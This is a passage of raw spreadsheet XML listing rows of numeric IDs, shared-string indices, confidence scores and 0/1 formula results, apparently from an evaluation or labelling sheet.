      </c>
      <c r="G862" s="62">
        <v>0.85</v>
      </c>
      <c r="H862" s="64">
        <v>0.0</v>
      </c>
      <c r="I862" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J862" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K862" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L862" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O862" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="62">
        <v>2901.0</v>
      </c>
      <c r="B863" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C863" s="63" t="s">
        <v>2794</v>
      </c>
      <c r="D863" s="62" t="s">
        <v>2795</v>
      </c>
      <c r="E863" s="62" t="s">
        <v>2796</v>
      </c>
      <c r="F863" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G863" s="62">
        <v>0.85</v>
      </c>
      <c r="H863" s="64">
        <v>1.0</v>
      </c>
      <c r="I863" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J863" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K863" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L863" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O863" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="62">
        <v>3042.0</v>
      </c>
      <c r="B864" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C864" s="63" t="s">
        <v>2797</v>
      </c>
      <c r="D864" s="62" t="s">
        <v>2798</v>
      </c>
      <c r="E864" s="62" t="s">
        <v>2799</v>
      </c>
      <c r="F864" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G864" s="62">
        <v>0.9</v>
      </c>
      <c r="H864" s="64">
        <v>0.0</v>
      </c>
      <c r="I864" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J864" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K864" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L864" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O864" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="62">
        <v>3091.0</v>
      </c>
      <c r="B865" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C865" s="63" t="s">
        <v>2800</v>
      </c>
      <c r="D865" s="62" t="s">
        <v>2801</v>
      </c>
      <c r="E865" s="62" t="s">
        <v>2802</v>
      </c>
      <c r="F865" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G865" s="62">
        <v>0.95</v>
      </c>
      <c r="H865" s="64">
        <v>1.0</v>
      </c>
      <c r="I865" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J865" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K865" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L865" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O865" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="62">
        <v>3539.0</v>
      </c>
      <c r="B866" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C866" s="63" t="s">
        <v>2803</v>
      </c>
      <c r="D866" s="62" t="s">
        <v>2804</v>
      </c>
      <c r="E866" s="62" t="s">
        <v>2805</v>
      </c>
      <c r="F866" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G866" s="62">
        <v>0.85</v>
      </c>
      <c r="H866" s="64">
        <v>1.0</v>
      </c>
      <c r="I866" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J866" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K866" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L866" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O866" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="62">
        <v>3772.0</v>
      </c>
      <c r="B867" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C867" s="63" t="s">
        <v>2806</v>
      </c>
      <c r="D867" s="62" t="s">
        <v>2807</v>
      </c>
      <c r="E867" s="62" t="s">
        <v>2808</v>
      </c>
      <c r="F867" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G867" s="62">
        <v>0.85</v>
      </c>
      <c r="H867" s="64">
        <v>0.0</v>
      </c>
      <c r="I867" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J867" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K867" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L867" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O867" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="868">
      <c r="A868" s="62">
        <v>5580.0</v>
      </c>
      <c r="B868" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C868" s="63" t="s">
        <v>2809</v>
      </c>
      <c r="D868" s="62" t="s">
        <v>2810</v>
      </c>
      <c r="E868" s="62" t="s">
        <v>2811</v>
      </c>
      <c r="F868" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G868" s="62">
        <v>0.9</v>
      </c>
      <c r="H868" s="64">
        <v>1.0</v>
      </c>
      <c r="I868" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J868" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K868" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L868" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O868" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="869">
      <c r="A869" s="62">
        <v>7283.0</v>
      </c>
      <c r="B869" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C869" s="63" t="s">
        <v>2812</v>
      </c>
      <c r="D869" s="62" t="s">
        <v>2813</v>
      </c>
      <c r="E869" s="62" t="s">
        <v>2814</v>
      </c>
      <c r="F869" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G869" s="62">
        <v>0.9</v>
      </c>
      <c r="H869" s="64">
        <v>1.0</v>
      </c>
      <c r="I869" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J869" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K869" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L869" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O869" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="870">
      <c r="A870" s="62">
        <v>9132.0</v>
      </c>
      <c r="B870" s="62" t="s">
        <v>110</v>
      </c>
      <c r="C870" s="63" t="s">
        <v>2815</v>
      </c>
      <c r="D870" s="62" t="s">
        <v>2816</v>
      </c>
      <c r="E870" s="62" t="s">
        <v>2817</v>
      </c>
      <c r="F870" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G870" s="62">
        <v>0.9</v>
      </c>
      <c r="H870" s="64">
        <v>1.0</v>
      </c>
      <c r="I870" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J870" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K870" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L870" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O870" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="871">
      <c r="A871" s="62">
        <v>72.0</v>
      </c>
      <c r="B871" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C871" s="63" t="s">
        <v>2818</v>
      </c>
      <c r="D871" s="62" t="s">
        <v>2819</v>
      </c>
      <c r="E871" s="62" t="s">
        <v>2820</v>
      </c>
      <c r="F871" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G871" s="62">
        <v>0.85</v>
      </c>
      <c r="H871" s="64">
        <v>1.0</v>
      </c>
      <c r="I871" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J871" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K871" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L871" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O871" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="62">
        <v>90.0</v>
      </c>
      <c r="B872" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C872" s="63" t="s">
        <v>2821</v>
      </c>
      <c r="D872" s="62" t="s">
        <v>2822</v>
      </c>
      <c r="E872" s="62" t="s">
        <v>2823</v>
      </c>
      <c r="F872" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G872" s="62">
        <v>0.8</v>
      </c>
      <c r="H872" s="64">
        <v>1.0</v>
      </c>
      <c r="I872" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J872" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K872" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L872" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O872" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="62">
        <v>91.0</v>
      </c>
      <c r="B873" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C873" s="63" t="s">
        <v>2824</v>
      </c>
      <c r="D873" s="62" t="s">
        <v>2825</v>
      </c>
      <c r="E873" s="62" t="s">
        <v>2826</v>
      </c>
      <c r="F873" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G873" s="62">
        <v>0.85</v>
      </c>
      <c r="H873" s="64">
        <v>1.0</v>
      </c>
      <c r="I873" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J873" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K873" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L873" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O873" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="62">
        <v>164.0</v>
      </c>
      <c r="B874" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C874" s="63" t="s">
        <v>2827</v>
      </c>
      <c r="D874" s="62" t="s">
        <v>2828</v>
      </c>
      <c r="E874" s="62" t="s">
        <v>2829</v>
      </c>
      <c r="F874" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G874" s="62">
        <v>0.9</v>
      </c>
      <c r="H874" s="64">
        <v>1.0</v>
      </c>
      <c r="I874" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J874" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K874" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L874" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O874" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="62">
        <v>166.0</v>
      </c>
      <c r="B875" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C875" s="63" t="s">
        <v>2830</v>
      </c>
      <c r="D875" s="62" t="s">
        <v>2831</v>
      </c>
      <c r="E875" s="62" t="s">
        <v>2832</v>
      </c>
      <c r="F875" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G875" s="62">
        <v>0.9</v>
      </c>
      <c r="H875" s="64">
        <v>1.0</v>
      </c>
      <c r="I875" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J875" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K875" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L875" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O875" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="62">
        <v>221.0</v>
      </c>
      <c r="B876" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C876" s="63" t="s">
        <v>2833</v>
      </c>
      <c r="D876" s="62" t="s">
        <v>2834</v>
      </c>
      <c r="E876" s="62" t="s">
        <v>2835</v>
      </c>
      <c r="F876" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G876" s="62">
        <v>0.9</v>
      </c>
      <c r="H876" s="64">
        <v>1.0</v>
      </c>
      <c r="I876" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J876" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K876" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L876" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O876" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="62">
        <v>224.0</v>
      </c>
      <c r="B877" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C877" s="63" t="s">
        <v>2836</v>
      </c>
      <c r="D877" s="62" t="s">
        <v>2837</v>
      </c>
      <c r="E877" s="62" t="s">
        <v>2838</v>
      </c>
      <c r="F877" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G877" s="62">
        <v>0.85</v>
      </c>
      <c r="H877" s="64">
        <v>1.0</v>
      </c>
      <c r="I877" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J877" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K877" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L877" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O877" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="62">
        <v>228.0</v>
      </c>
      <c r="B878" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C878" s="63" t="s">
        <v>2839</v>
      </c>
      <c r="D878" s="62" t="s">
        <v>2840</v>
      </c>
      <c r="E878" s="62" t="s">
        <v>2841</v>
      </c>
      <c r="F878" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G878" s="62">
        <v>0.85</v>
      </c>
      <c r="H878" s="64">
        <v>1.0</v>
      </c>
      <c r="I878" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J878" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K878" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L878" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O878" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="62">
        <v>229.0</v>
      </c>
      <c r="B879" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C879" s="63" t="s">
        <v>2842</v>
      </c>
      <c r="D879" s="62" t="s">
        <v>2843</v>
      </c>
      <c r="E879" s="62" t="s">
        <v>2844</v>
      </c>
      <c r="F879" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G879" s="62">
        <v>0.85</v>
      </c>
      <c r="H879" s="64">
        <v>1.0</v>
      </c>
      <c r="I879" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J879" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K879" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L879" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O879" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="62">
        <v>290.0</v>
      </c>
      <c r="B880" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C880" s="63" t="s">
        <v>2845</v>
      </c>
      <c r="D880" s="62" t="s">
        <v>2846</v>
      </c>
      <c r="E880" s="62" t="s">
        <v>2847</v>
      </c>
      <c r="F880" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G880" s="62">
        <v>0.9</v>
      </c>
      <c r="H880" s="64">
        <v>1.0</v>
      </c>
      <c r="I880" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J880" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K880" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L880" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O880" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="62">
        <v>299.0</v>
      </c>
      <c r="B881" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C881" s="63" t="s">
        <v>2848</v>
      </c>
      <c r="D881" s="62" t="s">
        <v>2849</v>
      </c>
      <c r="E881" s="62" t="s">
        <v>2850</v>
      </c>
      <c r="F881" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G881" s="62">
        <v>0.9</v>
      </c>
      <c r="H881" s="64">
        <v>1.0</v>
      </c>
      <c r="I881" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J881" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K881" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L881" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O881" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="62">
        <v>330.0</v>
      </c>
      <c r="B882" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C882" s="63" t="s">
        <v>2851</v>
      </c>
      <c r="D882" s="62" t="s">
        <v>2852</v>
      </c>
      <c r="E882" s="62" t="s">
        <v>2853</v>
      </c>
      <c r="F882" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G882" s="62">
        <v>0.9</v>
      </c>
      <c r="H882" s="64">
        <v>1.0</v>
      </c>
      <c r="I882" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J882" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K882" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L882" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O882" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="62">
        <v>409.0</v>
      </c>
      <c r="B883" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C883" s="63" t="s">
        <v>2854</v>
      </c>
      <c r="D883" s="62" t="s">
        <v>2855</v>
      </c>
      <c r="E883" s="62" t="s">
        <v>2856</v>
      </c>
      <c r="F883" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G883" s="62">
        <v>0.9</v>
      </c>
      <c r="H883" s="64">
        <v>1.0</v>
      </c>
      <c r="I883" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J883" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K883" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L883" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O883" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="62">
        <v>411.0</v>
      </c>
      <c r="B884" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C884" s="63" t="s">
        <v>2857</v>
      </c>
      <c r="D884" s="62" t="s">
        <v>2858</v>
      </c>
      <c r="E884" s="62" t="s">
        <v>2859</v>
      </c>
      <c r="F884" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G884" s="62">
        <v>0.9</v>
      </c>
      <c r="H884" s="64">
        <v>1.0</v>
      </c>
      <c r="I884" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J884" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K884" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L884" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O884" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="62">
        <v>414.0</v>
      </c>
      <c r="B885" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C885" s="63" t="s">
        <v>2860</v>
      </c>
      <c r="D885" s="62" t="s">
        <v>2861</v>
      </c>
      <c r="E885" s="62" t="s">
        <v>2862</v>
      </c>
      <c r="F885" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G885" s="62">
        <v>0.85</v>
      </c>
      <c r="H885" s="64">
        <v>1.0</v>
      </c>
      <c r="I885" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J885" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K885" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L885" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O885" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="62">
        <v>444.0</v>
      </c>
      <c r="B886" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C886" s="63" t="s">
        <v>2863</v>
      </c>
      <c r="D886" s="62" t="s">
        <v>2864</v>
      </c>
      <c r="E886" s="62" t="s">
        <v>2865</v>
      </c>
      <c r="F886" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G886" s="62">
        <v>0.85</v>
      </c>
      <c r="H886" s="64">
        <v>1.0</v>
      </c>
      <c r="I886" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J886" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K886" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L886" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O886" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="62">
        <v>492.0</v>
      </c>
      <c r="B887" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C887" s="63" t="s">
        <v>2866</v>
      </c>
      <c r="D887" s="62" t="s">
        <v>2867</v>
      </c>
      <c r="E887" s="62" t="s">
        <v>2868</v>
      </c>
      <c r="F887" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G887" s="62">
        <v>0.85</v>
      </c>
      <c r="H887" s="64">
        <v>1.0</v>
      </c>
      <c r="I887" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J887" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K887" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L887" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O887" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="62">
        <v>661.0</v>
      </c>
      <c r="B888" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C888" s="63" t="s">
        <v>2869</v>
      </c>
      <c r="D888" s="62" t="s">
        <v>2870</v>
      </c>
      <c r="E888" s="62" t="s">
        <v>2871</v>
      </c>
      <c r="F888" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G888" s="62">
        <v>0.85</v>
      </c>
      <c r="H888" s="64">
        <v>1.0</v>
      </c>
      <c r="I888" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J888" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K888" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L888" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O888" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="62">
        <v>862.0</v>
      </c>
      <c r="B889" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C889" s="63" t="s">
        <v>2872</v>
      </c>
      <c r="D889" s="62" t="s">
        <v>2873</v>
      </c>
      <c r="E889" s="62" t="s">
        <v>2874</v>
      </c>
      <c r="F889" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G889" s="62">
        <v>0.95</v>
      </c>
      <c r="H889" s="64">
        <v>1.0</v>
      </c>
      <c r="I889" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J889" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K889" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L889" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O889" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="62">
        <v>1023.0</v>
      </c>
      <c r="B890" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C890" s="63" t="s">
        <v>2875</v>
      </c>
      <c r="D890" s="62" t="s">
        <v>2876</v>
      </c>
      <c r="E890" s="62" t="s">
        <v>2877</v>
      </c>
      <c r="F890" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G890" s="62">
        <v>0.95</v>
      </c>
      <c r="H890" s="64">
        <v>1.0</v>
      </c>
      <c r="I890" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J890" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K890" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L890" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O890" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="62">
        <v>1143.0</v>
      </c>
      <c r="B891" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C891" s="63" t="s">
        <v>2878</v>
      </c>
      <c r="D891" s="62" t="s">
        <v>2879</v>
      </c>
      <c r="E891" s="62" t="s">
        <v>2880</v>
      </c>
      <c r="F891" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G891" s="62">
        <v>0.9</v>
      </c>
      <c r="H891" s="64">
        <v>1.0</v>
      </c>
      <c r="I891" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J891" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K891" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L891" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O891" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="62">
        <v>1227.0</v>
      </c>
      <c r="B892" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C892" s="63" t="s">
        <v>2881</v>
      </c>
      <c r="D892" s="62" t="s">
        <v>2882</v>
      </c>
      <c r="E892" s="62" t="s">
        <v>2883</v>
      </c>
      <c r="F892" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G892" s="62">
        <v>0.85</v>
      </c>
      <c r="H892" s="64">
        <v>1.0</v>
      </c>
      <c r="I892" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J892" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K892" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L892" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O892" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="62">
        <v>1310.0</v>
      </c>
      <c r="B893" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C893" s="63" t="s">
        <v>2884</v>
      </c>
      <c r="D893" s="62" t="s">
        <v>2885</v>
      </c>
      <c r="E893" s="62" t="s">
        <v>2886</v>
      </c>
      <c r="F893" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G893" s="62">
        <v>0.8</v>
      </c>
      <c r="H893" s="64">
        <v>1.0</v>
      </c>
      <c r="I893" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J893" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K893" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L893" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O893" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="62">
        <v>1395.0</v>
      </c>
      <c r="B894" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C894" s="63" t="s">
        <v>2887</v>
      </c>
      <c r="D894" s="62" t="s">
        <v>2888</v>
      </c>
      <c r="E894" s="62" t="s">
        <v>2889</v>
      </c>
      <c r="F894" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G894" s="62">
        <v>0.9</v>
      </c>
      <c r="H894" s="64">
        <v>1.0</v>
      </c>
      <c r="I894" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J894" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K894" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L894" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O894" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="62">
        <v>1548.0</v>
      </c>
      <c r="B895" s="62" t="s">
        <v>112</v>
      </c>
      <c r="C895" s="63" t="s">
        <v>2890</v>
      </c>
      <c r="D895" s="62" t="s">
        <v>2891</v>
      </c>
      <c r="E895" s="62" t="s">
        <v>2892</v>
      </c>
      <c r="F895" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G895" s="62">
        <v>0.95</v>
      </c>
      <c r="H895" s="64">
        <v>1.0</v>
      </c>
      <c r="I895" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J895" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K895" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L895" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O895" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="62">
        <v>1621.0</v>
      </c>
      <c r="B896" s="62" t="s">
        <v>112</v>
      </c>
